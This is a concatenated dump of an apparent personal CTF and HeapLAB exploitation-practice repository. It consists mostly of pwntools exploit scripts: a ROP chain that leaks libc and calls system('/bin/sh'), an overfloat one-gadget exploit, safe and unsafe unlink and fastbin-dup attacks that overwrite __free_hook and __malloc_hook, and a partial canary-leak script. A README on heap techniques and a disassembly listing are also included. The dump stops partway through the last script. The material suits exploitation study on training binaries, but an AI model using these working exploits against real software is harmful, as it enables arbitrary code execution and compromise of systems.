ELF('./libc.so') 9 | context.log_level = "DEBUG" 10 | 11 | gs = ''' 12 | break *0x401573 13 | ''' 14 | 15 | # cmp canary 0x5555555556e5 16 | 17 | def start(): 18 | if args.GDB: 19 | return gdb.debug(elf.path, gdbscript=gs) 20 | else: 21 | # return remote('orxw.balsnctf.com', 19091) 22 | return process(elf.path) 23 | 24 | print(elf.plt) 25 | print(elf.symbols) 26 | p=start() 27 | 28 | ## GADGETS 29 | 30 | POP_RDI=next(elf.search(asm("pop rdi; ret"))) 31 | log.info('POP_RDI') 32 | print(hex(POP_RDI)) 33 | # $rsp 0x7fffffffdeb0 34 | # 0x7fffffffdebe: pop rdi 35 | 36 | 37 | # ================================ GET LEAK ========= 38 | 39 | c=cyclic_metasploit(100) 40 | padd=24 41 | p.sendlineafter(b'Can you defeat orxw?',b'A'*padd+p64(POP_RDI)+p64(elf.got['read'])+p64(elf.symbols['puts'])+p64(elf.symbols['main'])) 42 | p.recvline() 43 | p.recvline() 44 | 45 | recieved = p.recvline().strip() 46 | leak_libc = u64(recieved.ljust(8, b"\x00")) 47 | 48 | 49 | # leak_libc=p.recvline()[:-1] 50 | # leak_libc=[ hex(x) for x in list(leak_libc) ] 51 | # leak_libc="".join(leak_libc[5]+leak_libc[4]+leak_libc[3]+leak_libc[2]+leak_libc[1]+leak_libc[0]).replace('0x','') 52 | # leak_libc=leak_libc[:-2]+'00' 53 | # leak_libc=int(leak_libc,16) 54 | # leak_libc=int('0x'+("".join(leak_libc[5]+leak_libc[4]+leak_libc[3]+leak_libc[2]+leak_libc[1]+leak_libc[0]).replace('0x','')),16) 55 | log.info('leak_libc') 56 | # print(hex(leak_libc)) 57 | print(hex(leak_libc)) 58 | 59 | 60 | # ================================ CALCULATE LIBC BASE ========= 61 | 62 | libc.address=leak_libc-libc.symbols['read'] 63 | 64 | log.info('LIBC BASE') 65 | print(hex(libc.address)) 66 | BINSH = next(libc.search(b"/bin/sh")) 67 | # p.sendlineafter(b'Can you defeat orxw?',b'A'*padd+p64(libc.address+0xe6c7e)) 68 | p.sendlineafter(b'Can you defeat orxw?',b'A'*padd+p64(POP_RDI)+p64(BINSH)+p64(libc.symbols['system'])+p64(elf.symbols['main'])) 69 | 70 | 71 | p.interactive() -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/fb19_overfloat/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import struct 3 | 4 | # Establish values for the rop chain 5 | putsPlt = 0x400690 6 | putsGot = 0x602020 7 | popRdi = 0x400a83 8 | 9 | startMain = 0x400993 10 | oneShot = 0x4f2c5 11 | 12 | # Some helper functions to help with the float input 13 | # These were made by qw3rty01 14 | pf = lambda x: struct.pack('f', x) 15 | uf = lambda x: struct.unpack('f', x)[0] 16 | 17 | # Establish the target, and the libc file 18 | #target = remote("challenges.fbctf.com", 1341) 19 | target = process('./overfloat', env={"LD_PRELOAD":"./libc-2.27.so"}) 20 | gdb.attach(target) 21 | 22 | # If for whatever reason you are using a different libc file, just change it out here and it should work 23 | libc = ELF('libc-2.27.so') 24 | 25 | # A helper function to send input, made by a team mate 26 | def sendVal(x): 27 | v1 = x & ((2**32) - 1) 28 | v2 = x >> 32 29 | target.sendline(str(uf(p32(v1)))) 30 | target.sendline(str(uf(p32(v2)))) 31 | 32 | # Fill up the space between the start of our input and the return address 33 | for i in xrange(7): 34 | sendVal(0xdeadbeefdeadbeef) 35 | 36 | # Send the rop chain to print libc address of puts 37 | # then loop around to the start of main 38 | 39 | sendVal(popRdi) 40 | sendVal(putsGot) 41 | sendVal(putsPlt) 42 | sendVal(startMain) 43 | 44 | # Send done so our code executes 45 | target.sendline('done') 46 | 47 | # Print out the target output 48 | print target.recvuntil('BON VOYAGE!\n') 49 | 50 | # Scan in, filter out the libc infoleak, calculate the base 51 | leak = target.recv(6) 52 | leak = u64(leak + "\x00"*(8-len(leak))) 53 | base = leak - libc.symbols['puts'] 54 | 55 | print "libc base: " + hex(base) 56 | 57 | # Fill up the space between the start of our input and the retun address 58 | # For the second round of exploiting the bug 59 | for i in xrange(7): 60 | sendVal(0xdeadbeefdeadbeef) 61 | 62 | # Overwrite the return address with a onegadget 63 | sendVal(base + oneShot) 64 | 65 | # Send done so our rop chain executes 66 | target.sendline('done') 67 | 68 | target.interactive() 69 | -------------------------------------------------------------------------------- /Templates/heap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("safe_unlink") 5 | libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size. 20 | # Returns chunk index. 21 | def malloc(size): 22 | global index 23 | io.send(b"1") 24 | io.sendafter(b"size: ", f"{size}".encode()) 25 | io.recvuntil(b"> ") 26 | index += 1 27 | return index - 1 28 | 29 | # Select the "edit" option; send index & data. 30 | def edit(index, data): 31 | io.send(b"2") 32 | io.sendafter(b"index: ", f"{index}".encode()) 33 | io.sendafter(b"data: ", data) 34 | io.recvuntil(b"> ") 35 | 36 | # Select the "free" option; send index. 37 | def free(index): 38 | io.send(b"3") 39 | io.sendafter(b"index: ", f"{index}".encode()) 40 | io.recvuntil(b"> ") 41 | 42 | io = start() 43 | 44 | # This binary leaks the address of puts(), use it to resolve the libc load address. 45 | io.recvuntil(b"puts() @ ") 46 | libc.address = int(io.recvline(), 16) - libc.sym.puts 47 | io.recvuntil(b"> ") 48 | io.timeout = 0.1 49 | 50 | # ============================================================================= 51 | 52 | # Print the address of m_array, where the program stores pointers to its allocated chunks. 53 | info(f"m_array @ 0x{elf.sym.m_array:02x}") 54 | 55 | # Request 2 small chunks. 56 | chunk_A = malloc(0x88) 57 | chunk_B = malloc(0x88) 58 | 59 | # Prepare fake chunk metadata. 60 | fd = elf.sym.m_array-24 61 | bk = elf.sym.m_array-16 62 | prev_size = 0x80 63 | fake_size = 0x90 64 | edit(chunk_A, p64(0)+p64(0x80)+ p64(fd) + p64(bk) + p8(0)*0x60 + p64(prev_size) + p64(fake_size)) 65 | 66 | # # Prepare consolidation 67 | free(chunk_B) 68 | 69 | # # Overwrite target 70 | edit(0,p64(0)*3 +p64(libc.sym.__free_hook - 8 )) 71 | edit(0, b'/bin/sh\0'+ p64(libc.sym.system)) 72 | free(0) 73 | 74 | # ============================================================================= 75 | 76 | io.interactive() 77 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("safe_unlink") 5 | libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size. 20 | # Returns chunk index. 21 | def malloc(size): 22 | global index 23 | io.send(b"1") 24 | io.sendafter(b"size: ", f"{size}".encode()) 25 | io.recvuntil(b"> ") 26 | index += 1 27 | return index - 1 28 | 29 | # Select the "edit" option; send index & data. 30 | def edit(index, data): 31 | io.send(b"2") 32 | io.sendafter(b"index: ", f"{index}".encode()) 33 | io.sendafter(b"data: ", data) 34 | io.recvuntil(b"> ") 35 | 36 | # Select the "free" option; send index. 37 | def free(index): 38 | io.send(b"3") 39 | io.sendafter(b"index: ", f"{index}".encode()) 40 | io.recvuntil(b"> ") 41 | 42 | io = start() 43 | 44 | # This binary leaks the address of puts(), use it to resolve the libc load address. 45 | io.recvuntil(b"puts() @ ") 46 | libc.address = int(io.recvline(), 16) - libc.sym.puts 47 | io.recvuntil(b"> ") 48 | io.timeout = 0.1 49 | 50 | # ============================================================================= 51 | 52 | # Print the address of m_array, where the program stores pointers to its allocated chunks. 53 | info(f"m_array @ 0x{elf.sym.m_array:02x}") 54 | 55 | # Request 2 small chunks. 56 | chunk_A = malloc(0x88) 57 | chunk_B = malloc(0x88) 58 | 59 | # Prepare fake chunk metadata. 60 | fd = elf.sym.m_array-24 61 | bk = elf.sym.m_array-16 62 | prev_size = 0x80 63 | fake_size = 0x90 64 | edit(chunk_A, p64(0)+p64(0x80)+ p64(fd) + p64(bk) + p8(0)*0x60 + p64(prev_size) + p64(fake_size)) 65 | 66 | # # Prepare consolidation 67 | free(chunk_B) 68 | 69 | # # Overwrite target 70 | edit(0,p64(0)*3 +p64(libc.sym.__free_hook - 8 )) 71 | edit(0, b'/bin/sh\0'+ p64(libc.sym.system)) 72 | free(0) 73 | 74 | # ============================================================================= 75 | 76 | io.interactive() 77 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/unsafe_unlink/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("unsafe_unlink") 5 | libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again 6 | context.log_level = "DEBUG" 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size. 20 | # Returns chunk index. 21 | def malloc(size): 22 | global index 23 | io.send(b"1") 24 | io.sendafter(b"size: ", f"{size}".encode()) 25 | io.recvuntil(b"> ") 26 | index += 1 27 | return index - 1 28 | 29 | # Select the "edit" option; send index & data. 30 | def edit(index, data): 31 | io.send(b"2") 32 | io.sendafter(b"index: ", f"{index}".encode()) 33 | io.sendafter(b"data: ", data) 34 | io.recvuntil(b"> ") 35 | 36 | # Select the "free" option; send index. 37 | def free(index): 38 | io.send(b"3") 39 | io.sendafter(b"index: ", f"{index}".encode()) 40 | io.recvuntil(b"> ") 41 | 42 | io = start() 43 | 44 | # This binary leaks the address of puts(), use it to resolve the libc load address. 45 | io.recvuntil(b"puts() @ " ) 46 | libc.address = int(io.recvline(), 16) - libc.sym.puts 47 | 48 | # This binary leaks the heap start address. 49 | io.recvuntil(b"heap @ ") 50 | heap = int(io.recvline(), 16) 51 | io.recvuntil(b"> ") 52 | io.timeout = 0.1 53 | 54 | # ============================================================================= 55 | 56 | # =-=-=- EXAMPLE -=-=-= 57 | 58 | # Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written. 59 | shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh")) 60 | 61 | chunk_a = malloc(0x88) 62 | chunk_b = malloc(0x88) 63 | 64 | fd = libc.sym.__free_hook - 0x18 65 | bk = heap+0x20 66 | prev_size = 0x90 67 | fakse_size = 0x90 68 | edit( chunk_a, p64(fd)+p64(bk)+shellcode+ p8(0)*(0x70-len(shellcode))+p64(prev_size)+p64(fakse_size) ) 69 | free(chunk_b) 70 | free(chunk_a) 71 | 72 | # ============================================================================= 73 | 74 | io.interactive() 75 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-one_byte/pwntools_template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("one_byte") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option. 20 | # Returns chunk index. 21 | def malloc(): 22 | global index 23 | io.sendthen("> ", "1") 24 | index += 1 25 | return index - 1 26 | 27 | # Select the "free" option; send index. 28 | def free(index): 29 | io.send("2") 30 | io.sendafter("index: ", f"{index}") 31 | io.recvuntil("> ") 32 | 33 | # Select the "edit" option; send index & data. 34 | def edit(index, data): 35 | io.send("3") 36 | io.sendafter("index: ", f"{index}") 37 | io.sendafter("data: ", data) 38 | io.recvuntil("> ") 39 | 40 | # Select the "read" option; read 0x58 bytes. 41 | def read(index): 42 | io.send("4") 43 | io.sendafter("index: ", f"{index}") 44 | r = io.recv(0x58) 45 | io.recvuntil("> ") 46 | return r 47 | 48 | io = start() 49 | io.recvuntil("> ") 50 | io.timeout = 0.1 51 | 52 | # ============================================================================= 53 | 54 | # =-=-=- EXAMPLE -=-=-= 55 | 56 | # Request a chunk. 57 | chunk_A = malloc() 58 | 59 | # Edit chunk A. 60 | edit(chunk_A, b"Y"*32) 61 | 62 | # Read data from chunk A. 63 | data = read(chunk_A) 64 | log.info(f"Read from chunk_A:\n{data}") 65 | 66 | # Free chunk A. 67 | free(chunk_A) 68 | 69 | # Because you haven't leaked a libc address yet, libc.sym. 70 | # will only print a symbol's offset, rather than its actual address. 71 | log.info(f"offset of puts() from start of GLIBC shared object: 0x{libc.sym.puts:02x}") 72 | 73 | # Once you've leaked an address, e.g. the printf() function, use: 74 | # libc.sym.address = - libc.sym.printf 75 | # to correctly set your libc base address to its runtime address. Now future calls 76 | # to libc.sym will use the symbol's actual address rather than its offset. 77 | 78 | # ============================================================================= 79 | 80 | io.interactive() 81 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/README.md: -------------------------------------------------------------------------------- 1 | ## Heap explotation guide 2 | ***************************************** 3 | 1.- House of Force ([link](https://github.com/ivanmedina/Pwning/tree/master/HEAP/HeapLAB/house_of_force)) 4 | - Overwrite top chunk to wrap until malloc_hook address with system function. 5 | 6 | 2.- Fastbin dup ([link](https://github.com/ivanmedina/Pwning/tree/master/HEAP/HeapLAB/fastbin_dup)) 7 | - Fastbin with use-after-free. 8 | - Bypass fake chunk size. 9 | 10 | 3.-Fastbin dup challange ([link](https://github.com/ivanmedina/Pwning/tree/master/HEAP/HeapLAB/challenge-fastbin_dup)) 11 | - Crafting fake chunk with fastbins in main arena to exploit malloc_hook. 12 | - Overwrite top chunk address in main arena so that when request it 13 | we return to our fake chunk. 14 | - Bypass check size of top chunk (GLibc 2.30). 15 | 16 | 4.- Unsafe unlink ([link](https://github.com/ivanmedina/Pwning/tree/master/HEAP/HeapLAB/unsafe_unlink)) 17 | - Request two chunks of same size. 18 | - Overflow prev_inuse flag of chunk_B from chunk_A for indicating that previous chunk is candidate to consolidation. 19 | - In this overflow we need also to set correctly the prev_size field of chunk A in chunk_B. 20 | - The overflow must set valid values of FD and BK in chunk_A that indicate where we want to point. (shellcode) 21 | 22 | 5.- Safe unlink ([link](https://github.com/ivanmedina/Pwning/tree/master/HEAP/HeapLAB/safe_unlink)) 23 | - Request two chunks A and B, and leveraged an overflow bug to clear prev_inuse flag on the allocated chunk B. 24 | - Prepare a fake chunk metadata in its previous chunk, chunk A, including a size field, forward pointer and backward pointer, and prev_size field. 25 | - When we freed chunk B, its clear prev_inuse flag indicated to malloc that the previous chunk was free, therefore a candidate for consolidation. 26 | - Malloc used our forged prev_size field to find the start of the previous chunk so it could unlink prior to consolidation. 27 | - FD and BK checked that the BK at the destination pointed back to our fake chunk, and perform the same check to BK. 28 | - Once our fake chunk passed the safe unlinking checks, malloc unlinked it. 29 | - It followed our FD and copied our BK over the BK at its destination. Then it followed our BK and copied our FD over the FD at its destination. 30 | 31 | ## References 32 | 33 | Max Kamper, Linux Heap Exploitation - Part 1, Udemy -------------------------------------------------------------------------------- /common/pwntools_template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("fastbin_dup_2") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size & data. 20 | # Returns chunk index. 21 | def malloc(size, data): 22 | global index 23 | io.send("1") 24 | io.sendafter("size: ", f"{size}") 25 | io.sendafter("data: ", data) 26 | io.recvuntil("> ") 27 | index += 1 28 | return index - 1 29 | 30 | # Select the "free" option; send index. 31 | def free(index): 32 | io.send("2") 33 | io.sendafter("index: ", f"{index}") 34 | io.recvuntil("> ") 35 | 36 | io = start() 37 | 38 | # This binary leaks the address of puts(), use it to resolve the libc load address. 39 | io.recvuntil("puts() @ ") 40 | libc.address = int(io.recvline(), 16) - libc.sym.puts 41 | io.timeout = 0.1 42 | 43 | # ============================================================================= 44 | 45 | # =-=-=- EXAMPLE -=-=-= 46 | 47 | # Request two 0x50-sized chunks. 48 | chunk_A = malloc(0x48, "A"*8) 49 | chunk_B = malloc(0x48, "B"*8) 50 | 51 | # Free the first chunk, then the second. 52 | free(chunk_A) 53 | free(chunk_B) 54 | free(chunk_A) 55 | 56 | #Overwrite a fastbin fd with a fake size field 57 | 58 | malloc(0x48,p64(0x61)) 59 | 60 | #Request chunks B & A, writing a 0x61 size field into the main arena 61 | 62 | malloc(0x48, "C"*8) 63 | malloc(0x48, "D"*8) 64 | 65 | # LINK THE FAKE MAIN ARENA CHUNK INTO THE 0X60 FASTBIN 66 | 67 | chunk_J=malloc(0x58, "J"*8) 68 | chunk_K=malloc(0x58, "K"*8) 69 | 70 | free(chunk_J) 71 | free(chunk_K) 72 | free(chunk_J) 73 | 74 | #Link the fake chunk into the 0x60 fastbin 75 | 76 | malloc(0x58,p64(libc.sym.main_arena +0x20)) 77 | 78 | #move the fake chink to the head of the 0x60 fastbin 79 | 80 | malloc(0x58,"-p\0") 81 | malloc(0x58,"-s\0") 82 | 83 | 84 | #==================================================================== 85 | #overwirte top chunk pointer 86 | malloc(0x58,b'Y'*48+p64(libc.sym.__malloc_hook -35)) 87 | 88 | #overwrite malloc_hook 89 | 90 | malloc(0x28,b'Y'*19+p64(libc.address +0xe1fa1)) 91 | 92 | malloc(1,'') 93 | 94 | 95 | # ============================================================================= 96 | 97 | io.interactive() 98 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/malloc_testbed/pwntools_template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("malloc_testbed") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size. 20 | # Return chunk index. 21 | def malloc(size): 22 | global index 23 | io.send("1") 24 | io.sendafter("size: ", f"{size}") 25 | io.recvuntil("> ") 26 | index += 1 27 | return index - 1 28 | 29 | # Select the "free" option; send index. 30 | def free(index): 31 | io.send("2") 32 | io.sendafter("index: ", f"{index}") 33 | io.recvuntil("> ") 34 | 35 | # Select the "free address" option; send address. 36 | def free_address(address): 37 | io.send("3") 38 | io.sendafter("address: ", f"{address}") 39 | io.recvuntil("> ") 40 | 41 | # Select the "edit" option; send index & data. 42 | def edit(index, data): 43 | io.send("4") 44 | io.sendafter("index: ", f"{index}") 45 | io.sendafter("data: ", data) 46 | io.recvuntil("> ") 47 | 48 | # Select the "read" option; send index. 49 | # Return data from read operation. 50 | def read(index): 51 | io.send("5") 52 | io.sendafter("index: ", f"{index}") 53 | r = io.recvuntil("\n1) malloc", drop=True) 54 | io.recvuntil("> ") 55 | return r 56 | 57 | io = start() 58 | 59 | # This binary leaks the address of puts(), use it to resolve the libc load address. 60 | io.recvuntil("puts() @ ") 61 | libc.address = int(io.recvline(), 16) - libc.sym.puts 62 | 63 | # This binary leaks the heap start address. 64 | io.recvuntil("heap @ ") 65 | heap = int(io.recvline(), 16) 66 | 67 | # This binary leaks the address of its m_array. 68 | io.recvuntil("m_array @ ") 69 | m_array = int(io.recvline(), 16) 70 | io.recvuntil("> ") 71 | io.timeout = 0.1 72 | 73 | # ============================================================================= 74 | 75 | # =-=-=- EXAMPLE -=-=-= 76 | 77 | # Log some useful addresses. 78 | log.info(f"libc is at 0x{libc.address:02x}") 79 | log.info(f"heap is at 0x{heap:02x}") 80 | log.info(f"m_array is at 0x{m_array:02x}") 81 | 82 | # Request 2 chunks. 83 | chunk_A = malloc(0x88) 84 | chunk_B = malloc(0x18) 85 | 86 | # Free "chunk_A". 87 | free(chunk_A) 88 | 89 | # Edit "chunk_B". 90 | edit(chunk_B, "Y"*8) 91 | 92 | # Read data from the "chunk_B". 93 | log.info(f"reading chunk_B: {read(chunk_B)[:8]}") 94 | 95 | # ============================================================================= 96 | 97 | io.interactive() 98 | -------------------------------------------------------------------------------- /shellcodeHandbook/INTDIVERSION/disas_valid_Serial: -------------------------------------------------------------------------------- 1 | 0x08049192 <+0>: push ebp 2 | 0x08049193 <+1>: mov ebp,esp 3 | 0x08049195 <+3>: push ebx 4 | 0x08049196 <+4>: sub esp,0xc 5 | 0x08049199 <+7>: call 0x8049306 <__x86.get_pc_thunk.ax> 6 | 0x0804919e <+12>: add eax,0x2e62 7 | 0x080491a3 <+17>: push DWORD PTR [ebp+0x8] 8 | 0x080491a6 <+20>: mov ebx,eax 9 | 0x080491a8 <+22>: call 0x8049060 10 | 0x080491ad <+27>: add esp,0x4 11 | 0x080491b0 <+30>: mov DWORD PTR [ebp-0x10],eax 12 | 0x080491b3 <+33>: mov DWORD PTR [ebp-0x8],0x0 13 | 0x080491ba <+40>: cmp DWORD PTR [ebp-0x10],0x9 14 | 0x080491be <+44>: ja 0x80491c7 15 | 0x080491c0 <+46>: mov eax,0x0 16 | 0x080491c5 <+51>: jmp 0x804923e 17 | 0x080491c7 <+53>: mov DWORD PTR [ebp-0xc],0x0 18 | 0x080491ce <+60>: jmp 0x804920a 19 | 0x080491d0 <+62>: mov edx,DWORD PTR [ebp+0x8] 20 | 0x080491d3 <+65>: mov eax,DWORD PTR [ebp-0xc] 21 | 0x080491d6 <+68>: add eax,edx 22 | 0x080491d8 <+70>: movzx eax,BYTE PTR [eax] 23 | 0x080491db <+73>: cmp al,0x2f 24 | 0x080491dd <+75>: jle 0x80491ee 25 | 0x080491df <+77>: mov edx,DWORD PTR [ebp+0x8] 26 | 0x080491e2 <+80>: mov eax,DWORD PTR [ebp-0xc] 27 | 0x080491e5 <+83>: add eax,edx 28 | 0x080491e7 <+85>: movzx eax,BYTE PTR [eax] 29 | 0x080491ea <+88>: cmp al,0x7a 30 | 0x080491ec <+90>: jle 0x80491f5 31 | 0x080491ee <+92>: mov eax,0x0 32 | 0x080491f3 <+97>: jmp 0x804923e 33 | 0x080491f5 <+99>: mov edx,DWORD PTR [ebp+0x8] 34 | 0x080491f8 <+102>: mov eax,DWORD PTR [ebp-0xc] 35 | 0x080491fb <+105>: add eax,edx 36 | 0x080491fd <+107>: movzx eax,BYTE PTR [eax] 37 | 0x08049200 <+110>: movsx eax,al 38 | 0x08049203 <+113>: add DWORD PTR [ebp-0x8],eax 39 | 0x08049206 <+116>: add DWORD PTR [ebp-0xc],0x1 40 | 0x0804920a <+120>: mov eax,DWORD PTR [ebp-0xc] 41 | 0x0804920d <+123>: cmp eax,DWORD PTR [ebp-0x10] 42 | 0x08049210 <+126>: jb 0x80491d0 43 | 0x08049212 <+128>: mov ecx,DWORD PTR [ebp-0x8] 44 | 0x08049215 <+131>: mov edx,0x266a3dd3 45 | 0x0804921a <+136>: mov eax,ecx 46 | 0x0804921c <+138>: mul edx 47 | 0x0804921e <+140>: mov eax,edx 48 | 0x08049220 <+142>: shr eax,0x7 49 | 0x08049223 <+145>: imul eax,eax,0x355 50 | 0x08049229 <+151>: sub ecx,eax 51 | 0x0804922b <+153>: mov eax,ecx 52 | 0x0804922d <+155>: cmp eax,0x53 53 | 0x08049230 <+158>: jne 0x8049239 54 | 0x08049232 <+160>: mov eax,0x1 55 | 0x08049237 <+165>: jmp 0x804923e 56 | 0x08049239 <+167>: mov eax,0x0 57 | 0x0804923e <+172>: mov ebx,DWORD PTR [ebp-0x4] 58 | 0x08049241 <+175>: leave 59 | 0x08049242 <+176>: ret 60 | 61 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("fastbin_dup_2") 5 | libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again 6 | context.log_level = "DEBUG" 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size & data. 20 | # Returns chunk index. 21 | def malloc(size, data): 22 | global index 23 | io.send(b"1") 24 | io.sendafter(b"size: ", f"{size}".encode()) 25 | io.sendafter(b"data: ", data) 26 | io.recvuntil(b"> ") 27 | index += 1 28 | return index - 1 29 | 30 | # Select the "free" option; send index. 31 | def free(index): 32 | io.send(b"2") 33 | io.sendafter(b"index: ", f"{index}".encode()) 34 | io.recvuntil(b"> ") 35 | 36 | io = start() 37 | 38 | # This binary leaks the address of puts(), use it to resolve the libc load address. 39 | io.recvuntil(b"puts() @ ") 40 | libc.address = int(io.recvline(), 16) - libc.sym.puts 41 | io.timeout = 0. 42 | # =========================================================================== 43 | # =-=-=- EXAMPLE -=-=-= 44 | # 1- PRIMER FASTBIN DUP 45 | # Request two 0x50-sized chunks. 46 | chunk_A = malloc(0x48, b"A"*0x48) 47 | chunk_B = malloc(0x48, b"B"*0x48) 48 | # Free the first chunk, then the second. 49 | free(chunk_A) 50 | free(chunk_B) 51 | free(chunk_A) 52 | # START ALL PWNING 53 | # SOBRESCRIBIR EL FD CON UN FAKE SIZE DE 0X61 PARA USAR UN FAST BIN DE 0X70 PARA APLICAR 54 | # EL TRUCO DEL FASTBIN 0X70 55 | malloc(0x48,p64(0x61)) # <------- esto escribo 56 | #AHORA CON LOS SIGUIENTES MALLOCS SE QUEDARA EL 0X61 EN LA MAIN ARENA 57 | malloc(0x48,'C'*48) 58 | malloc(0x48,'D'*48) 59 | 60 | #2- SEGUNDO FASTBIN 61 | # MEZCLAR EL FAKE CHUNK DE LA ARENA EN EL FASTBIN DE 0X60 62 | chunk_J=malloc(0X58,'C'*48) 63 | chunk_K=malloc(0x58,'D'*48) 64 | free(chunk_J) 65 | free(chunk_K) 66 | free(chunk_J) 67 | # !!! PARA EVITAR QUE NOS REDIRECCIONE A 0X61 ya no pediremos 68 | # !!! CUNKS DE 0X48 (72) bytes 69 | # Ahora si escribir lo que enlazaras 70 | malloc(0x58, p64( libc.sym.main_arena + 0x20 )) 71 | # Mover el fake chunk falso a los fastbin y ponerlo en el head de los fastbins 0x60 72 | malloc(0x58,b'-s\0') 73 | malloc(0x58,b'M'*8) 74 | # ahora podemos armar el facke chunk por que ya tenemos el check size 75 | # y podemos escribir en la main arena en el siguiente chunk que solicitemos 76 | # con un mallos de 0x58 de lo ultimo que quedo en bin 77 | #lo siguiente sobrescribira en el top chunk para que el siguiente malloc 78 | #nos regrese el fake chunk 79 | malloc(0x58,b'Y'*48+p64(libc.sym.__malloc_hook -35)) 80 | #hasta adq mainhora llevamos un fake chunk en main arena para escribir en malloc_hook 81 | #el top chunk nos regresa el malloc hook para escribir en el 82 | # este malloc hook se sobrescribira aunque estemos algo atras con un pad de 19 83 | 84 | #malloc(0x28,b'Y'*19+p64(0xdeadbeef)) 85 | malloc(0x28,b'Y'*19+p64(libc.address + 0xe1fa1)) 86 | 87 | malloc(0x28,b'') 88 | # Puede ser complejo por que al mismo tiempo que creamos un fake chunk en el main 89 | # arena, seguimos tambien utilizando los fastbin tanto como para mantener una 90 | # direccion para armar el fake chunk, tanto como para escribir en ellos 91 | # ============================================================================= 92 | io.interactive() 93 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csawquals17_svc/exploit.py: -------------------------------------------------------------------------------- 1 | # Import pwntools 2 | from pwn import * 3 | 4 | target = process("./svc", env={"LD_PRELOAD":"./libc-2.23.so"}) 5 | gdb.attach(target) 6 | 7 | elf = ELF('svc') 8 | 9 | 10 | # 0x0000000000400ea3 : pop rdi ; ret 11 | popRdi = p64(0x400ea3) 12 | 13 | gotPuts = p64(0x602018) 14 | pltPuts = p64(0x4008cc) 15 | 16 | offsetPuts = 0x6f690 17 | offsetSystem = 0x45390 18 | offsetBinsh = 0x18cd57 19 | #offsetPuts = 0x83cc0 20 | #offsetSystem = 0x52fd0 21 | #offsetBinsh = 0x1afb84 22 | 23 | startMain = p64(0x400a96) 24 | 25 | # Establish fucntions to handle I/O with the target 26 | def feed(data): 27 | print target.recvuntil(">>") 28 | target.sendline('1') 29 | print target.recvuntil(">>") 30 | target.send(data) 31 | 32 | def review(): 33 | print target.recvuntil(">>") 34 | target.sendline('2') 35 | #print target.recvuntil("[*]PLEASE TREAT HIM WELL.....\n-------------------------\n") 36 | #leak = target.recvuntil("-------------------------").replace("-------------------------", "") 37 | print target.recvuntil("0"*0xa9) 38 | canaryLeak = target.recv(7) 39 | canary = u64("\x00" + canaryLeak) 40 | print "canary is: " + hex(canary) 41 | return canary 42 | 43 | def leave(): 44 | print target.recvuntil(">>") 45 | target.sendline("3") 46 | 47 | # Start of with the canary leak. We will overflow the buffer write up to the stack canary, and overwrite the least signifcant byte of the canary 48 | leakCanary = "" 49 | leakCanary += "0"*0xa8 # Fill up space up to the canary 50 | leakCanary += "0" # Overwrite least significant byte of the canary 51 | 52 | 53 | 54 | feed(leakCanary) # Execute the overwrite 55 | 56 | canary 